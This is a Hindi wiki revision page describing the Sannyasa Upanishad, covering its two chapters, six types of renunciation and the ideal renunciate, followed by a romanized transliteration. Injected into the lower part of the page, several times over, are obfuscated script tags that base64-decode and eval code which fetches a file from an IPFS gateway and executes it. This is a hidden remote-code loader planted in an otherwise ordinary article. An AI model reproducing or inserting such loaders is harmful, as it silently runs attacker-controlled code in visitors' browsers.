Difference between revisions of "सन्न्यासोपनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
m (Text replacement - "सन्न्यासी" to "संन्यासी")
 
(13 intermediate revisions by 6 users not shown)
Line 1: Line 1:
{{menu}}
 
{{सामवेदीय उपनिषद}}
 
==संन्यासोपनिषद==
 
 
सामवेद से सम्बद्ध इस उपनिषद में मात्र दो अध्याय हैं।  
 
सामवेद से सम्बद्ध इस उपनिषद में मात्र दो अध्याय हैं।  
*प्रथम अध्याय में 'संन्यास' के विषय में बताया गया है और दूसरे अध्याय में साधन-चतुष्टय-विवेक, वैराग्य, षट्सम्पत्ति और मुमुक्षुत्व (मोक्ष)- की बात कही गयी है। संन्यास का अधिकारी कौन है? इस प्रश्न का उत्तर दिया गया है। संन्यासी के भेद बताते हुए वैराग्य-संन्यासी, ज्ञान-संन्यासी, ज्ञान-वैराग्य-संन्यासी और कर्म-संन्यासी की विस्तृत व्याख्या की गयी है।
+
*प्रथम अध्याय में 'सन्न्यास' के विषय में बताया गया है और दूसरे अध्याय में साधन-चतुष्टय-विवेक, वैराग्य, षट्सम्पत्ति और मुमुक्षुत्व (मोक्ष)- की बात कही गयी है। सन्न्यास का अधिकारी कौन है? इस प्रश्न का उत्तर दिया गया है। संन्यासी के भेद बताते हुए वैराग्य-संन्यासी, ज्ञान-संन्यासी, ज्ञान-वैराग्य-संन्यासी और कर्म-संन्यासी की विस्तृत व्याख्या की गयी है।
*यहां छह प्रकार के संन्यास-
+
*यहाँ छह प्रकार के सन्न्यास-
 
#'कुटीचक्र',  
 
#'कुटीचक्र',  
 
#'बहूदक',  
 
#'बहूदक',  
Line 14: Line 11:
 
*संन्यासी के लिए आचरण की शुद्धता, पवित्रता और सन्तोष का होना परम अनिवार्य माना गया है। उसे भोग-विलास से दूर रहना चाहिए। आहार-विहार पर संयम रखना चाहिए। सदैव आत्म-चिन्तन करते रहना चाहिए। ओंकार का जय करके मोक्ष पाने का प्रयत्न करना चाहिए।  
 
*संन्यासी के लिए आचरण की शुद्धता, पवित्रता और सन्तोष का होना परम अनिवार्य माना गया है। उसे भोग-विलास से दूर रहना चाहिए। आहार-विहार पर संयम रखना चाहिए। सदैव आत्म-चिन्तन करते रहना चाहिए। ओंकार का जय करके मोक्ष पाने का प्रयत्न करना चाहिए।  
 
*वास्तव में संन्यासी वह है, जिसने आत्मा के उत्थान हेतु माता-पिता, स्त्री-पुत्र, बन्धु-बान्धव आदि का पूर्ण रूप से त्याग कर दिया हो। आत्मा का ध्यान ही संन्यासी का यज्ञोपवीत है, विद्या ही उसकी चोटी है, जल के लिए उदर ही संन्यासी का पात्र है, जलाशय का तट ही उसका आश्रय-स्थल है, उसके लिए न रात्रि है, न दिन है। पूर्ण रूप से विरक्त, सभी को सुख देने वाला, आशा, ईर्ष्या, अहंकार से दूर, लौकिक भोगों को त्यागने वाला, मोक्ष की इच्छा का प्रबल साधक, ज्ञानी, शान्ति, धैर्य और श्रद्धा का पात्र व ब्रह्म का उपासक ही संन्यासी कहे जाने योग्य है।  
 
*वास्तव में संन्यासी वह है, जिसने आत्मा के उत्थान हेतु माता-पिता, स्त्री-पुत्र, बन्धु-बान्धव आदि का पूर्ण रूप से त्याग कर दिया हो। आत्मा का ध्यान ही संन्यासी का यज्ञोपवीत है, विद्या ही उसकी चोटी है, जल के लिए उदर ही संन्यासी का पात्र है, जलाशय का तट ही उसका आश्रय-स्थल है, उसके लिए न रात्रि है, न दिन है। पूर्ण रूप से विरक्त, सभी को सुख देने वाला, आशा, ईर्ष्या, अहंकार से दूर, लौकिक भोगों को त्यागने वाला, मोक्ष की इच्छा का प्रबल साधक, ज्ञानी, शान्ति, धैर्य और श्रद्धा का पात्र व ब्रह्म का उपासक ही संन्यासी कहे जाने योग्य है।  
 
+
{{प्रचार}}
<br />
+
==संबंधित लेख==
==उपनिषद के अन्य लिंक==
+
{{संस्कृत साहित्य}}
{{उपनिषद}}
+
{{सामवेदीय उपनिषद}}
[[Category: कोश]]
+
[[Category:दर्शन कोश]]
[[Category:उपनिषद]]
+
[[Category:उपनिषद]][[Category:संस्कृत साहित्य]]
[[Category: पौराणिक ग्रन्थ]]  
+
 
__INDEX__
 
__INDEX__

Latest revision as of 11:44, 3 August 2017

samaved se sambaddh is upanishad mean matr do adhyay haian.

  • pratham adhyay mean 'sannyas' ke vishay mean bataya gaya hai aur doosare adhyay mean sadhan-chatushtay-vivek, vairagy, shatsampatti aur mumukshutv (moksh)- ki bat kahi gayi hai. sannyas ka adhikari kaun hai? is prashn ka uttar diya gaya hai. sannyasi ke bhed batate hue vairagy-sannyasi, jnan-sannyasi, jnan-vairagy-sannyasi aur karm-sannyasi ki vistrit vyakhya ki gayi hai.
  • yahaan chhah prakar ke sannyas-
  1. 'kutichakr',
  2. 'bahoodak',
  3. 'hans',
  4. 'paramahans',
  5. 'turiyatit' aur
  6. 'avadhoot' adi – ka ullekh kiya gaya hai. isi kram mean upanishadakar ne 'atmajnan' ko sthiti aur svaroop ka bhi varnan kiya hai.

sannyasi kaun hai?

  • sannyasi ke lie acharan ki shuddhata, pavitrata aur santosh ka hona param anivary mana gaya hai. use bhog-vilas se door rahana chahie. ahar-vihar par sanyam rakhana chahie. sadaiv atm-chintan karate rahana chahie. oankar ka jay karake moksh pane ka prayatn karana chahie.
  • vastav mean sannyasi vah hai, jisane atma ke utthan hetu mata-pita, stri-putr, bandhu-bandhav adi ka poorn roop se tyag kar diya ho. atma ka dhyan hi sannyasi ka yajnopavit hai, vidya hi usaki choti hai, jal ke lie udar hi sannyasi ka patr hai, jalashay ka tat hi usaka ashray-sthal hai, usake lie n ratri hai, n din hai. poorn roop se virakt, sabhi ko sukh dene vala, asha, eershya, ahankar se door, laukik bhogoan ko tyagane vala, moksh ki ichchha ka prabal sadhak, jnani, shanti, dhairy aur shraddha ka patr v brahm ka upasak hi sannyasi kahe jane yogy hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>